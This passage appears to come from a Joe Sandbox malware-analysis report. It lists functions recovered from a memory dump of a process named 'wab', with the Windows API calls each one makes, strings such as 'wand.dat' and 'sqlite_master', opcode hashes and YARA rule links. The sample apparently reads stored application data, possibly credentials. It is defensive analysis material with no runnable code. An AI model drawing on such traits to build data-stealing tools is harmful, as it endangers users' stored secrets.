                                                                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                • _wtoi.MSVCRT ref: 00410C80
                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1549203181-0
                                                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3550944819-0
                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3023356884-0
                                                                                                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3023356884-0
                                                                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1171893557-0
                                                                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: sqlite_master
                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 822687973-0
                                                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284152360-0
                                                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2678498856-0
                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3727323765-0
                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284152360-0
                                                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
